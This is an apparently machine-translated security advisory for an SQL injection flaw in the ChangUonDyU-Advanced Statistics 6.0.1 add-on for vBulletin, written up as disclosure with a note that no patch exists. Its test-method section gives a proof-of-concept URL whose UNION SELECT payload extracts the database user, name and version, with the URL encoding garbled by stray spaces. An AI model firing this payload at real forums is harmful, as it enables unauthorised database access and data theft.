VBulletin ChangUonDyU-Advanced Statistics SQL Injection Vulnerability

Release date: 2012-11-02
Updated on:

Affected Systems:
Hoiquantinhoc ChangUonDyU-Advanced Statistics 6.0.1
Description:
--------------------------------------------------------------------------------
Bugtraq id: 56379
 
VBulletin is a powerful and flexible forum program suite that can be customized based on your needs.
 
ChangUonDyU-Advanced Statistics 6.0.1 and other versions have the SQL injection vulnerability. Attackers can exploit this vulnerability to control applications, access or modify data, and exploit other vulnerabilities in lower-level databases.
 
<* Source: Juno_okyo

Link: http://www.exploit-db.com/exploits/22429/
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Http://www.example.com/f/ajax.php? Do = inforum & amp; listforumid = 100% 29% 20 UNION % 20 SELECT % 201, concat_ws % 280x7c, user % 28% 29, database % 28% 29, version % 28% 29%, 3, 4, 5, 6, 7, 8, 9, 10 -- % 20-& amp; result = 20

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
 
Hoiquantinhoc
-------------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
 
Http://hoiquantinhoc.com/modifications-3-8-x/4468-changuondyu-advanced-statistics-6-0-1-a.html